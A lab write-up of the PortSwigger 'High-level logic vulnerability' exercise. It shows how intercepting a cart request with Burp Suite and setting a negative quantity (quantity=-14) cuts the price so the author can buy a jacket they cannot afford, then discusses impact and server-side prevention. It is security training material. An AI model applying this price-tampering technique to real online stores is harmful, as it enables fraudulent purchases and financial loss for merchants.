Introduction
Business logic vulnerabilities occur when flaws exist in the way an application processes legitimate user actions. Unlike technical vulnerabilities such as SQL injection or XSS, business logic flaws exploit weaknesses in the application's intended workflow and rules.
This write-up covers the PortSwigger Web Security Academy lab titled "High-level logic vulnerability." The lab demonstrates how improper handling of order quantities can allow an attacker to manipulate the purchasing process and obtain products for unintended prices.
Objective of the Lab
The goal of the lab is to purchase the Lightweight L33t Leather Jacket despite having insufficient funds in the account balance.
The vulnerability exists because the application fails to properly validate negative quantity values during the ordering process.
Understanding the Vulnerability
In a secure shopping application, product quantities should only accept positive values.
For example:
- Quantity =
1→ valid - Quantity =
5→ valid - Quantity =
-1→ invalid
However, in this lab, the application accepts negative quantities, which creates a logical flaw in how the cart total is calculated.
By abusing this behavior, attackers can manipulate the total price of their cart and reduce the final payment amount.
Tools Used
- Burp Suite Community Edition
- Browser with Burp Proxy enabled
- PortSwigger Web Security Academy Lab
Steps to Exploit the Vulnerability
1. Add the Jacket to the Cart
First, add the Lightweight L33t Leather Jacket to the shopping cart.
The jacket costs more than the available account balance, so purchasing it normally is impossible.
2. Add Another Cheap Item
Next, add a low-cost item to the cart multiple times.
For example:
- A product worth a few dollars
- Quantity set to a positive value initially
This item will later be manipulated to reduce the total cost.
I decided to add 1 Item that has an amount of $96.94 since my store credit is $100.00.
3. Intercept the Cart Request
Using Burp Suite, intercept the request responsible for updating cart quantities.
The request appears similar to this:
POST /cart HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
productId=2&quantity=1&redir=CART
4. Change the Quantity to a Negative Number
Modify the quantity parameter from:
quantity=1to a negative value such as:
quantity=-14Forward the request to the server.
Once i added the -14 and i hit send with repeater i went back to the cart and refreshed it and this is what i saw :
5. Observe the Cart Total
After updating the cart:
- The negative quantity causes the application to subtract money from the total
- The final cart price becomes extremely low or even negative
- The expensive jacket can now be purchased using the available balance
Proceed to checkout and complete the order successfully.
The lab is solved once the jacket is purchased.
Why the Vulnerability Exists
The vulnerability exists because the application does not properly validate business rules regarding product quantities.
The server accepts negative numbers without checking whether they make logical sense in the purchasing workflow.
This allows attackers to manipulate the calculation process and bypass financial restrictions.
Impact of the Vulnerability
If exploited in a real-world application, this vulnerability could result in:
- Financial losses
- Fraudulent purchases
- Inventory abuse
- Revenue manipulation
- Broken payment systems
Business logic flaws can be especially dangerous because they often bypass traditional security tools and protections.
How to Prevent This Vulnerability
Developers can prevent this issue by implementing strict server-side validation.
Validate Input Properly
Applications should reject:
- Negative quantities
- Extremely large values
- Invalid numeric inputs
Enforce Business Rules on the Server
The server should ensure that:
- Quantities remain within acceptable ranges
- Cart totals cannot become negative
- Pricing logic cannot be manipulated by users
Use Secure Calculation Logic
Sensitive calculations should always be securely handled server-side rather than relying on client-controlled data.
Conclusion
This lab demonstrates how small logical mistakes in application workflows can lead to serious security issues. By manipulating quantity values, an attacker can abuse the application's pricing system and purchase expensive products at unintended prices.
The exercise highlights an important lesson in application security:
Applications must validate not only technical input, but also logical business behavior.
Proper server-side validation and strict enforcement of business rules are essential to preventing business logic vulnerabilities.